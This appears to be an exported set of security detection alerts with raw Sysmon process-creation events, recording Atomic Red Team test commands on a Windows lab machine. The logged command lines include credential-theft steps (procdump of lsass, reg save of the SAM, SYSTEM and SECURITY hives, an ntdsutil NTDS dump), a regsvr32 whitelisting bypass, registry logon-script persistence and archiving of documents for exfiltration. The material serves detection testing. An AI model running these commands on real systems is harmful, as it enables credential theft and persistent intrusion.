+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4061
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:57:03.223
+ 747F3D96-DA3F-5D31-0000-00104C173C00
+ 4832
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "certutil.exe -encode c:\file.exe file.txt"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548097.044623,2019-07-19T18:54:57.044623+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4054
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:54:16.818
+ 747F3D96-D998-5D31-0000-00101BB73900
+ 2424
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548056.830063,2019-07-19T18:54:16.830063+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "rar a -r exfilthis.rar *.docx" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4053
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:54:16.766
+ 747F3D96-D998-5D31-0000-001008B43900
+ 2000
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "rar a -r exfilthis.rar *.docx"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548056.782667,2019-07-19T18:54:16.782667+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4052
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:54:01.940
+ 747F3D96-D989-5D31-0000-0010FC7B3900
+ 4944
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548035.018275,2019-07-19T18:53:55.018275+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d " cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4049
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:54.968
+ 747F3D96-D982-5D31-0000-0010DC633900
+ 4240
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d " cmd.exe
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563548034.976854,2019-07-19T18:53:54.976854+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4048
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:47.230
+ 747F3D96-D97B-5D31-0000-0010F0F03800
+ 6888
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\regsvr32.exe) with commandline ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4047
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:47.056
+ 747F3D96-D97B-5D31-0000-00109DEB3800
+ 5788
+ C:\Windows\SysWOW64\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8
+ 747F3D96-D97A-5D31-0000-001019DE3800
+ 5828
+ C:\Windows\System32\regsvr32.exe
+ "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Regsvr32,1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4047
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:47.056
+ 747F3D96-D97B-5D31-0000-00109DEB3800
+ 5788
+ C:\Windows\SysWOW64\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8
+ 747F3D96-D97A-5D31-0000-001019DE3800
+ 5828
+ C:\Windows\System32\regsvr32.exe
+ "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1563548027.239318,2019-07-19T18:53:47.239318+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\regsvr32.exe ) through command line ( /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4047
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:53:47.056
+ 747F3D96-D97B-5D31-0000-00109DEB3800
+ 5788
+ C:\Windows\SysWOW64\regsvr32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Microsoft(C) Register Server
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8
+ 747F3D96-D97A-5D31-0000-001019DE3800
+ 5828
+ C:\Windows\System32\regsvr32.exe
+ "C:\Windows\system32\regsvr32.exe" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549086.989143,2019-07-19T19:11:26.989143+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "vssadmin.exe create shadow /for=C:" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4128
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:26.958
+ 747F3D96-DD9E-5D31-0000-00100C3F4B00
+ 5036
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "vssadmin.exe create shadow /for=C:"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549086.971596,2019-07-19T19:11:26.971596+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4127
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:26.875
+ 747F3D96-DD9E-5D31-0000-00106D3A4B00
+ 4208
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549086.884595,2019-07-19T19:11:26.884595+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "ntdsutil “ac i ntds†“ifm†“create full C:\Atomic_Red_Team q q" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4126
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:26.845
+ 747F3D96-DD9E-5D31-0000-001059374B00
+ 584
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "ntdsutil “ac i ntds†“ifm†“create full C:\Atomic_Red_Team q q"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549086.852817,2019-07-19T19:11:26.852817+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4125
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:26.673
+ 747F3D96-DD9E-5D31-0000-00109A2F4B00
+ 264
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,High,User Name : ( MSEDGEWIN10\IEUser ) with Command Line : ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ) contain suspicious command ( procdump.exe),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4124
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:26.626
+ 747F3D96-DD9E-5D31-0000-00106E2C4B00
+ 5488
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549086.686585,2019-07-19T19:11:26.686585+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4124
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:26.626
+ 747F3D96-DD9E-5D31-0000-00106E2C4B00
+ 5488
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549086.642464,2019-07-19T19:11:26.642464+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4123
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:26.535
+ 747F3D96-DD9E-5D31-0000-0010CB274B00
+ 3016
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549083.336763,2019-07-19T19:11:23.336763+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4121
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:23.302
+ 747F3D96-DD9B-5D31-0000-00106C1C4B00
+ 7164
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg save HKLM\security security"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549081.105496,2019-07-19T19:11:21.105496+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4119
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:21.069
+ 747F3D96-DD99-5D31-0000-001069A34A00
+ 4080
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg save HKLM\system system"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549077.243643,2019-07-19T19:11:17.243643+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4117
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:17.211
+ 747F3D96-DD95-5D31-0000-001075964A00
+ 7140
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg save HKLM\sam sam"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563549077.224751,2019-07-19T19:11:17.224751+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 4116
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 15:11:17.139
+ 747F3D96-DD95-5D31-0000-0010D6914A00
+ 6264
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-DD47-5D31-0000-001015874900
+ 5840
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
